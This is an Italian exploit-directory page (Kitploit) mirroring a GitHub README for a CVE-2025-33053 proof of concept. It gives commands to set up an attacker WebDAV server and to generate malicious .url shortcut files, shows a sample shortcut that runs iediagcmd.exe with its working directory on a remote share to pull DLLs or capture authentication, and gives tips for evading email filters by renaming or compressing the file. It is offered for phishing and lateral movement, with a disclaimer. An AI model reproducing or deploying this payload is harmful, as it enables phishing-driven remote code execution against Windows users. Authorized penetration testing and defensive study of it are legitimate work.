Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-33053-Proof-Of-Concept — CVE-2025-33053 Prova di Concetto (PoC) | Kitploit
Strumenti/GitHubGitHub/devbuihieu/cve-2025-33053-proof-of-concept
Generazione di PayloadExploitMovimento LateralePhishingSicurezza WebPenetration TestingCommand and ControlIngegneria SocialeRed Teaming

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHubdevbuihieu/cve-2025-33053-proof-of-concept

CVE-2025-33053-Proof-Of-Concept

CVE-2025-33053 Prova di Concetto (PoC)

Vedi Repository
64161 anno faRevisionato da Kitploit

CVE-2025-33053 Prova di Concetto

Questo repository fornisce script per distribuire automaticamente un server WebDAV su Ubuntu usando Apache2 e generare file .url dannosi per l'uso in phishing, red teaming o simulazione di movimento laterale.


📁 Contenuti

  • setup_webdav.sh – Script Bash per configurare Apache2 + WebDAV.
  • setup_webdav.py – Versione Python del precedente.
  • gen_url.py – Script Python per generare file .url con percorsi UNC/WebDAV.
  • README.md – Documentazione.

🔧 Requisiti

  • SO: Ubuntu 20.04 o successivo (compatibile con Debian)
  • Privilegi di root (sudo)
  • Python 3.x

🚀 Istruzioni di configurazione

1. Server WebDAV (tramite Bash)

root@kitploit:~
sudo bash setup_webdav.sh

Oppure usando Python:

root@kitploit:~
sudo python3 setup_webdav.py

Per impostazione predefinita, lo script:

  • Installa Apache e i moduli WebDAV necessari.
  • Crea una directory condivisa in /var/www/webdav.
  • Abilita i moduli DAV e DAV_FS.
  • Crea una directory DavLockDB (per evitare errori di blocco DAV di Apache).
  • Riavvia il servizio Apache.

📎 Percorso WebDAV: http://<tuo-ip>/webdav/


💣 Generazione di un collegamento .url dannoso

Esempio d'uso:

root@kitploit:~
python3 gen_url.py --ip 192.168.1.100 --out doc.url

Tutte le opzioni:

root@kitploit:~
python3 gen_url.py \
  --ip 《YOUR IP ADDRESS》\
  --share 《YOUR SHARE NAME》(Default: webdav) \
  --out 《YOUR OUTPUT FILENAME.url》(Default: bait.url) \
  --exe "C:\Program Files\Internet Explorer\iediagcmd.exe" \
  --icon "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe" \
  --index 13 \
  --modified 20F06BA06D07BD014D

Questo creerà un file .url come:

root@kitploit:~
[InternetShortcut]
URL=C:\Program Files\Internet Explorer\iediagcmd.exe
WorkingDirectory=\\192.168.1.100\webdav\
ShowCommand=7
IconIndex=13
IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Modified=20F06BA06D07BD014D

📌 Facendo clic su questo file (in determinate configurazioni) potrebbe indurre il sistema di destinazione a connettersi automaticamente al tuo server WebDAV (autenticazione o distribuzione di DLL).


🔒 Note per i test di sicurezza

  • Disabilita il firewall (o apri la porta 80) se esegui test su una rete locale:
    root@kitploit:~
    sudo ufw allow 80
    
  • I file .url potrebbero non essere eseguiti come previsto a seconda di:
    • Restrizioni delle Criteri di gruppo
    • Applicazioni predefinite
    • Client di posta elettronica (Gmail potrebbe sanitizzarli)
  • Potrebbe essere necessario comprimere o rinominare .url in .txt per aggirare i filtri.

⚠️ Avviso legale

Questo repository è esclusivamente per test di penetrazione didattici e autorizzati.
Non utilizzare questi script contro sistemi di cui non sei proprietario o per i quali non hai il permesso di test.


🧠 Riferimenti

  • Configurazione del server WebDAV - LinuxConfig.org
  • Configurazione WebDAV Apache - Peter Girnus
  • Documentazione WebDAV di Microsoft

📬 Contatto

Per domande o richieste di red teaming etico, contatta tramite le issue di GitHub.

Scarica lo strumento